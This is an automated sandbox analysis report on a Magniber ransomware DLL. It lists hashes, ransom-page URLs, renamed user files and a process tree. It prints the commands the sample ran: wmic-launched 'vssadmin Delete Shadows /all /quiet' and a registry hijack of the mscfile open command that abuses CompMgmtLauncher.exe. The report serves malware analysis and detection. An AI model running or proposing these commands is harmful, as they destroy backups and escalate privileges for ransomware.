Analysis
-
max time kernel
142s -
max time network
146s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
29-08-2021 11:34
Static task
static1
Behavioral task
behavioral1
Sample
2.dll
Resource
win7v20210408
Behavioral task
behavioral2
Sample
2.dll
Resource
win10v20210408
General
-
Target
2.dll
-
Size
38KB
-
MD5
af93e6f3ae4466cefe7aa27baedfec96
-
SHA1
b6dc065d489b104c9aa08aacc6f97dd0b672d907
-
SHA256
5cfd8fefb03c8b0417743f48b9c8ac041387b9f0d24e775d0917a4c7de41847d
-
SHA512
43273b952f19d77499b5fce4f0c937e71017c56c133991832a1fa2a39151790e9161f794e4ea07776dc5a291f5c1d8a8d98b9c9ddcdce4c84a4de50346d1eef2
Malware Config
Extracted
C:\Users\Admin\Desktop\readme.txt
magniber
http://feb8c46022607eb03hramozl.755w262jegubyu4txxdvjupbul2uelswocczig2rw6ex2fhbguvlkfyd.onion/hramozl
http://feb8c46022607eb03hramozl.centone.top/hramozl
http://feb8c46022607eb03hramozl.burybig.xyz/hramozl
http://feb8c46022607eb03hramozl.dumpour.space/hramozl
http://feb8c46022607eb03hramozl.joyfits.site/hramozl
Signatures
-
Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
-
Process spawned unexpected child process 12 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exevssadmin.exevssadmin.exevssadmin.execmd.exevssadmin.execmd.exevssadmin.exevssadmin.exevssadmin.execmd.exevssadmin.exedescription pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1776 1332 cmd.exe 39 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 548 1332 vssadmin.exe 39 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 428 1332 vssadmin.exe 39 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2096 1332 vssadmin.exe 39 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2132 1332 cmd.exe 39 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2288 1332 vssadmin.exe 39 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2632 1332 cmd.exe 39 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2624 1332 vssadmin.exe 39 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2796 1332 vssadmin.exe 39 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2960 1332 vssadmin.exe 39 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2984 1332 cmd.exe 39 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2156 1332 vssadmin.exe 39 -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies extensions of user files 9 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
Dwm.exedescription ioc Process File opened for modification C:\Users\Admin\Pictures\ApproveExport.tiff Dwm.exe File renamed C:\Users\Admin\Pictures\EnableReset.tif => C:\Users\Admin\Pictures\EnableReset.tif.hramozl Dwm.exe File renamed C:\Users\Admin\Pictures\UpdateStart.tif => C:\Users\Admin\Pictures\UpdateStart.tif.hramozl Dwm.exe File opened for modification C:\Users\Admin\Pictures\WatchConvert.tiff Dwm.exe File renamed C:\Users\Admin\Pictures\BackupClose.crw => C:\Users\Admin\Pictures\BackupClose.crw.hramozl Dwm.exe File renamed C:\Users\Admin\Pictures\BlockRevoke.crw => C:\Users\Admin\Pictures\BlockRevoke.crw.hramozl Dwm.exe File renamed C:\Users\Admin\Pictures\GetSkip.raw => C:\Users\Admin\Pictures\GetSkip.raw.hramozl Dwm.exe File renamed C:\Users\Admin\Pictures\ApproveExport.tiff => C:\Users\Admin\Pictures\ApproveExport.tiff.hramozl Dwm.exe File renamed C:\Users\Admin\Pictures\WatchConvert.tiff => C:\Users\Admin\Pictures\WatchConvert.tiff.hramozl Dwm.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
rundll32.exedescription pid Process procid_target PID 1996 set thread context of 1120 1996 rundll32.exe 20 PID 1996 set thread context of 1180 1996 rundll32.exe 19 PID 1996 set thread context of 1224 1996 rundll32.exe 18 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Interacts with shadow copies 2 TTPs 8 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exepid Process 2156 vssadmin.exe 548 vssadmin.exe 428 vssadmin.exe 2096 vssadmin.exe 2288 vssadmin.exe 2624 vssadmin.exe 2796 vssadmin.exe 2960 vssadmin.exe -
Processes:
iexplore.exeIEXPLORE.EXEdescription ioc Process Set value (data) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000005dc1e460b427c44a91b6ff2747202d100000000020000000000106600000001000020000000c7a49437bcbe105312c7d8cf4ca4b55f1ba103d3e6d84a2d0f4c9e5bef53f286000000000e80000000020000200000000ab8bd62c475ffee236615819e9e6739ee901d9d28dafab113d31b4979e33c4d20000000c93a8f8547d3a117354307cb7b400c4ea620abcb1a17386920133d49fe65efc440000000daad7635c53a6f4fcfecd66f990739807e642a1698bf5bd0614962006e9e616a93bb20c07419ce2088da44941a06a49b88946d827451d3ae5609391ff68c8260 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = f0309945da9cd701 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000005dc1e460b427c44a91b6ff2747202d1000000000200000000001066000000010000200000006a94bcbec0cfb9dd171011b3953bd1c63dc7d052a687d6021e847231a02f551c000000000e8000000002000020000000975efcf268b9de64917585d0e65b5e7fa7b9c95c392a5c19292a277d6e519361900000003b6a178ff7ffa2601cd27567c68a9df0e4d46196d4165bf76d63b04b710c5002d10f9d796c6e1c0d28d1f9f5a4a7b1c95213f111c2755007c82bbd1cb6db67f86f6a5bb5270653f56bc5e3992441870c4f55b864e69ab4ef18847885c5c5de1e2df91aa4db75eb24308906247d9960229a4e2fb37e18e71e197bd24e9ca2044f3a581e6f079d74d380df848614d9a65d40000000cd109145cd25164e66c45aac18c743d9a5eb5245da12285abc4b38b320dcbf9940a579d1bdfbcf5c687ff8a2d311a2b86f08c91bf9a05113a99d2039540bb530 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{6BF8A241-08CD-11EC-896A-766459B397AD} = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "337008869" iexplore.exe -
Modifies registry class 11 IoCs
Processes:
Dwm.exetaskhost.exerundll32.exeExplorer.EXEdescription ioc Process Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open\command Dwm.exe Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" taskhost.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open\command rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" rundll32.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open\command taskhost.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open\command Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile Dwm.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell Dwm.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open Dwm.exe Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" Dwm.exe -
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
notepad.exepid Process 1660 notepad.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
rundll32.exepid Process 1996 rundll32.exe 1996 rundll32.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
Processes:
Explorer.EXEiexplore.exepid Process 1224 Explorer.EXE 1384 iexplore.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
Processes:
rundll32.exepid Process 1996 rundll32.exe 1996 rundll32.exe 1996 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Explorer.EXEwmic.exeWMIC.exedescription pid Process Token: SeShutdownPrivilege 1224 Explorer.EXE Token: SeIncreaseQuotaPrivilege 240 wmic.exe Token: SeSecurityPrivilege 240 wmic.exe Token: SeTakeOwnershipPrivilege 240 wmic.exe Token: SeLoadDriverPrivilege 240 wmic.exe Token: SeSystemProfilePrivilege 240 wmic.exe Token: SeSystemtimePrivilege 240 wmic.exe Token: SeProfSingleProcessPrivilege 240 wmic.exe Token: SeIncBasePriorityPrivilege 240 wmic.exe Token: SeCreatePagefilePrivilege 240 wmic.exe Token: SeBackupPrivilege 240 wmic.exe Token: SeRestorePrivilege 240 wmic.exe Token: SeShutdownPrivilege 240 wmic.exe Token: SeDebugPrivilege 240 wmic.exe Token: SeSystemEnvironmentPrivilege 240 wmic.exe Token: SeRemoteShutdownPrivilege 240 wmic.exe Token: SeUndockPrivilege 240 wmic.exe Token: SeManageVolumePrivilege 240 wmic.exe Token: 33 240 wmic.exe Token: 34 240 wmic.exe Token: 35 240 wmic.exe Token: SeShutdownPrivilege 1224 Explorer.EXE Token: SeShutdownPrivilege 1224 Explorer.EXE Token: SeIncreaseQuotaPrivilege 916 WMIC.exe Token: SeSecurityPrivilege 916 WMIC.exe Token: SeTakeOwnershipPrivilege 916 WMIC.exe Token: SeLoadDriverPrivilege 916 WMIC.exe Token: SeSystemProfilePrivilege 916 WMIC.exe Token: SeSystemtimePrivilege 916 WMIC.exe Token: SeProfSingleProcessPrivilege 916 WMIC.exe Token: SeIncBasePriorityPrivilege 916 WMIC.exe Token: SeCreatePagefilePrivilege 916 WMIC.exe Token: SeBackupPrivilege 916 WMIC.exe Token: SeRestorePrivilege 916 WMIC.exe Token: SeShutdownPrivilege 916 WMIC.exe Token: SeDebugPrivilege 916 WMIC.exe Token: SeSystemEnvironmentPrivilege 916 WMIC.exe Token: SeRemoteShutdownPrivilege 916 WMIC.exe Token: SeUndockPrivilege 916 WMIC.exe Token: SeManageVolumePrivilege 916 WMIC.exe Token: 33 916 WMIC.exe Token: 34 916 WMIC.exe Token: 35 916 WMIC.exe Token: SeShutdownPrivilege 1224 Explorer.EXE Token: SeIncreaseQuotaPrivilege 240 wmic.exe Token: SeSecurityPrivilege 240 wmic.exe Token: SeTakeOwnershipPrivilege 240 wmic.exe Token: SeLoadDriverPrivilege 240 wmic.exe Token: SeSystemProfilePrivilege 240 wmic.exe Token: SeSystemtimePrivilege 240 wmic.exe Token: SeProfSingleProcessPrivilege 240 wmic.exe Token: SeIncBasePriorityPrivilege 240 wmic.exe Token: SeCreatePagefilePrivilege 240 wmic.exe Token: SeBackupPrivilege 240 wmic.exe Token: SeRestorePrivilege 240 wmic.exe Token: SeShutdownPrivilege 240 wmic.exe Token: SeDebugPrivilege 240 wmic.exe Token: SeSystemEnvironmentPrivilege 240 wmic.exe Token: SeRemoteShutdownPrivilege 240 wmic.exe Token: SeUndockPrivilege 240 wmic.exe Token: SeManageVolumePrivilege 240 wmic.exe Token: 33 240 wmic.exe Token: 34 240 wmic.exe Token: 35 240 wmic.exe -
Suspicious use of FindShellTrayWindow 8 IoCs
Processes:
Explorer.EXEiexplore.exepid Process 1224 Explorer.EXE 1224 Explorer.EXE 1224 Explorer.EXE 1384 iexplore.exe 1224 Explorer.EXE 1224 Explorer.EXE 1224 Explorer.EXE 1224 Explorer.EXE -
Suspicious use of SendNotifyMessage 7 IoCs
Processes:
Explorer.EXEpid Process 1224 Explorer.EXE 1224 Explorer.EXE 1224 Explorer.EXE 1224 Explorer.EXE 1224 Explorer.EXE 1224 Explorer.EXE 1224 Explorer.EXE -
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
iexplore.exeIEXPLORE.EXEpid Process 1384 iexplore.exe 1384 iexplore.exe 240 IEXPLORE.EXE 240 IEXPLORE.EXE 240 IEXPLORE.EXE 240 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Dwm.execmd.execmd.execmd.exeiexplore.exeCompMgmtLauncher.exetaskhost.execmd.execmd.exeCompMgmtLauncher.exerundll32.execmd.execmd.exeCompMgmtLauncher.exeExplorer.EXEdescription pid Process procid_target PID 1180 wrote to memory of 1660 1180 Dwm.exe 29 PID 1180 wrote to memory of 1660 1180 Dwm.exe 29 PID 1180 wrote to memory of 1660 1180 Dwm.exe 29 PID 1180 wrote to memory of 1964 1180 Dwm.exe 30 PID 1180 wrote to memory of 1964 1180 Dwm.exe 30 PID 1180 wrote to memory of 1964 1180 Dwm.exe 30 PID 1180 wrote to memory of 240 1180 Dwm.exe 31 PID 1180 wrote to memory of 240 1180 Dwm.exe 31 PID 1180 wrote to memory of 240 1180 Dwm.exe 31 PID 1180 wrote to memory of 1896 1180 Dwm.exe 33 PID 1180 wrote to memory of 1896 1180 Dwm.exe 33 PID 1180 wrote to memory of 1896 1180 Dwm.exe 33 PID 1896 wrote to memory of 916 1896 cmd.exe 36 PID 1896 wrote to memory of 916 1896 cmd.exe 36 PID 1896 wrote to memory of 916 1896 cmd.exe 36 PID 1964 wrote to memory of 1384 1964 cmd.exe 37 PID 1964 wrote to memory of 1384 1964 cmd.exe 37 PID 1964 wrote to memory of 1384 1964 cmd.exe 37 PID 1776 wrote to memory of 1468 1776 cmd.exe 44 PID 1776 wrote to memory of 1468 1776 cmd.exe 44 PID 1776 wrote to memory of 1468 1776 cmd.exe 44 PID 1384 wrote to memory of 240 1384 iexplore.exe 48 PID 1384 wrote to memory of 240 1384 iexplore.exe 48 PID 1384 wrote to memory of 240 1384 iexplore.exe 48 PID 1384 wrote to memory of 240 1384 iexplore.exe 48 PID 1468 wrote to memory of 620 1468 CompMgmtLauncher.exe 49 PID 1468 wrote to memory of 620 1468 CompMgmtLauncher.exe 49 PID 1468 wrote to memory of 620 1468 CompMgmtLauncher.exe 49 PID 1120 wrote to memory of 1684 1120 taskhost.exe 53 PID 1120 wrote to memory of 1684 1120 taskhost.exe 53 PID 1120 wrote to memory of 1684 1120 taskhost.exe 53 PID 1120 wrote to memory of 944 1120 taskhost.exe 55 PID 1120 wrote to memory of 944 1120 taskhost.exe 55 PID 1120 wrote to memory of 944 1120 taskhost.exe 55 PID 944 wrote to memory of 1788 944 cmd.exe 57 PID 944 wrote to memory of 1788 944 cmd.exe 57 PID 944 wrote to memory of 1788 944 cmd.exe 57 PID 2132 wrote to memory of 2188 2132 cmd.exe 62 PID 2132 wrote to memory of 2188 2132 cmd.exe 62 PID 2132 wrote to memory of 2188 2132 cmd.exe 62 PID 2188 wrote to memory of 2236 2188 CompMgmtLauncher.exe 63 PID 2188 wrote to memory of 2236 2188 CompMgmtLauncher.exe 63 PID 2188 wrote to memory of 2236 2188 CompMgmtLauncher.exe 63 PID 1996 wrote to memory of 2504 1996 rundll32.exe 68 PID 1996 wrote to memory of 2504 1996 rundll32.exe 68 PID 1996 wrote to memory of 2504 1996 rundll32.exe 68 PID 1996 wrote to memory of 2516 1996 rundll32.exe 69 PID 1996 wrote to memory of 2516 1996 rundll32.exe 69 PID 1996 wrote to memory of 2516 1996 rundll32.exe 69 PID 2516 wrote to memory of 2564 2516 cmd.exe 72 PID 2516 wrote to memory of 2564 2516 cmd.exe 72 PID 2516 wrote to memory of 2564 2516 cmd.exe 72 PID 2632 wrote to memory of 2680 2632 cmd.exe 77 PID 2632 wrote to memory of 2680 2632 cmd.exe 77 PID 2632 wrote to memory of 2680 2632 cmd.exe 77 PID 2680 wrote to memory of 2744 2680 CompMgmtLauncher.exe 78 PID 2680 wrote to memory of 2744 2680 CompMgmtLauncher.exe 78 PID 2680 wrote to memory of 2744 2680 CompMgmtLauncher.exe 78 PID 1224 wrote to memory of 2852 1224 Explorer.EXE 82 PID 1224 wrote to memory of 2852 1224 Explorer.EXE 82 PID 1224 wrote to memory of 2852 1224 Explorer.EXE 82 PID 1224 wrote to memory of 2864 1224 Explorer.EXE 83 PID 1224 wrote to memory of 2864 1224 Explorer.EXE 83 PID 1224 wrote to memory of 2864 1224 Explorer.EXE 83
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1224 -
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\2.dll,#12⤵
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1996 -
C:\Windows\system32\wbem\wmic.exeC:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:2504
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""3⤵
- Suspicious use of WriteProcessMemory
PID:2516 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"4⤵PID:2564
-
-
-
-
C:\Windows\system32\wbem\wmic.exeC:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"2⤵PID:2852
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""2⤵PID:2864
-
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"3⤵PID:2916
-
-
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"1⤵
- Modifies extensions of user files
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1180 -
C:\Windows\system32\notepad.exenotepad.exe C:\Users\Public\readme.txt2⤵
- Opens file in notepad (likely ransom note)
PID:1660
-
-
C:\Windows\system32\cmd.execmd /c "start http://feb8c46022607eb03hramozl.centone.top/hramozl^&1^&39881967^&72^&315^&12"2⤵
- Suspicious use of WriteProcessMemory
PID:1964 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://feb8c46022607eb03hramozl.centone.top/hramozl&1&39881967&72&315&123⤵
- Modifies Internet Explorer settings
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1384 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1384 CREDAT:275457 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:240
-
-
-
-
C:\Windows\system32\wbem\wmic.exeC:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:240
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:1896 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:916
-
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1120 -
C:\Windows\system32\wbem\wmic.exeC:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"2⤵PID:1684
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:944 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"3⤵PID:1788
-
-
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1776 -
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1468 -
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:620
-
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:548
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:1628
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:428
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2096
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2132 -
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2188 -
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:2236
-
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2288
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2632 -
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2680 -
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:2744
-
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2624
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2796
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2960
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
PID:2984 -
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵PID:3036
-
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:2076
-
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2156
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
d0bd834b57e5155340299bb8a9379124
SHA11fa23745482366b6324dcb6406794b8363539652
SHA2565e38888328694492c3644814844f185627d4495823473f47e3a6804e8b976c83
SHA512cca4196e9f2cda2e95cfc5ede5a0b5457109fae1726140da665d2171ac450856c449797f4e82d779451508967c7a2230318e6252854286612e1aa499c85c5d08
-
MD5
49c09189c8b9a40c0cd06070c7987163
